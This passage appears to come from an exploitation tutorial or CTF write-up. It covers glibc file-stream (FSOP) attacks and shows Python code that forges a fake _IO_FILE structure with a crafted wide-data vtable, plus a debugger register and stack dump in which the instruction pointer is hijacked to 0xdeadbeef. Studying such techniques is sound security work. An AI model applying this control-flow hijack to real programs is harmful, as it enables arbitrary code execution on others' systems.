FS += p64(0x0000000000000000) + p64(FAKE_LOCK) # _IO_lock
FS += p64(0xffffffffffffffff) + p64(0x0000000000000000) # _IO_offset / _IO_codecvt
FS += p64(FAKE_WIDE_DATA) + p64(0x0000000000000000) # _IO_wide_data / _IO_save_wide_data
FS += p64(0x0000000000000000) + p64(0x0000000000000000) # _freeres_buf / __pad5
FS += p64(0x0000000000000001) + p64(FAKE_WIDE_VTABLE) # _mode / unused2
FS += p64(0x0000000000000000) + p64(FAKE_VTABLE) # _unused2 / vtable
We can set wide_data._wide_vtable just to stdout itself. Calling _IO_WOVERFLOW will then effectively calls stdout+0x18 (which is 0xdeadbeef in this example).
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
───────────────────────────────────────────────────────────────────────────────────── registers ────
$rax : 0x00007ffff7e045c0 → 0x00000000fbad0800
$rbx : 0x00007ffff7e045c0 → 0x00000000fbad0800
$rcx : 0x1
$rdx : 0xfbad0a00
$rsp : 0x00007fffffffcfb8 → 0x00007ffff7c8afe0 → <_IO_switch_to_wget_mode+0030> cmp eax, 0xffffffff
$rbp : 0x00007fffffffcfd0 → 0x00007fffffffd010 → 0x00007fffffffd090 → 0x00007fffffffd110 → 0x00007fffffffd170 → 0x00007fffffffd180 → 0x00007fffffffd1b0 → 0x00007fffffffd250
$rsi : 0xffffffff
$rdi : 0x00007ffff7e045c0 → 0x00000000fbad0800
$rip : 0xdeadbeef
$r8 : 0x00007fffffffd0c0 → 0x00000001ffffd0d0
$r9 : 0x0
$r10 : 0x00007fffffffd04f → 0x007fffffffd06000
$r11 : 0x00007fffffffd050 → 0x00007fffffffd060 → 0x00007fffffffd090 → 0x00007fffffffd110 → 0x00007fffffffd170 → 0x00007fffffffd180 → 0x00007fffffffd1b0 → 0x00007fffffffd250
$r12 : 0xffffffff
$r13 : 0xd0
$r14 : 0x00007ffff7e045c0 → 0x00000000fbad0800
$r15 : 0x00007ffff7e056f0 → 0x0000000000000001
$eflags: [zero CARRY PARITY adjust SIGN trap INTERRUPT direction overflow RESUME virtualx86 identification]
$cs: 0x33 $ss: 0x2b $ds: 0x00 $es: 0x00 $fs: 0x00 $gs: 0x00
─────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
[!] Cannot disassemble from $PC
───────────────────────────────────────────────────────────────────────────────────────── stack ────
0x00007fffffffcfb8│+0x0000: 0x00007ffff7c8afe0 → <_IO_switch_to_wget_mode+0030> cmp eax, 0xffffffff ← $rsp
0x00007fffffffcfc0│+0x0008: 0x00007fffffffd090 → 0x00007fffffffd110 → 0x00007fffffffd170 → 0x00007fffffffd180 → 0x00007fffffffd1b0 → 0x00007fffffffd250 → 0x00007fffffffd2b0
0x00007fffffffcfc8│+0x0010: 0x00000000000000d0
0x00007fffffffcfd0│+0x0018: 0x00007fffffffd010 → 0x00007fffffffd090 → 0x00007fffffffd110 → 0x00007fffffffd170 → 0x00007fffffffd180 → 0x00007fffffffd1b0 → 0x00007fffffffd250 ← $rbp
0x00007fffffffcfd8│+0x0020: 0x00007ffff7c8b533 → <_IO_wdefault_xsgetn+0203> cmp eax, 0xffffffff
0x00007fffffffcfe0│+0x0028: 0x00007ffff7fbd160 → 0x00007ffff7c00000 → 0x03010102464c457f
0x00007fffffffcfe8│+0x0030: 0x00007ffff7e045c0 → 0x00000000fbad0800
0x00007fffffffcff0│+0x0038: 0x0000000000000000
Since we only need to make sure that _wide_data->_IO_write_ptr is bigger than _wide_data->_IO_write_base, we can also set rdx with this again to an arbitrary address (it just needs to be greater than flags).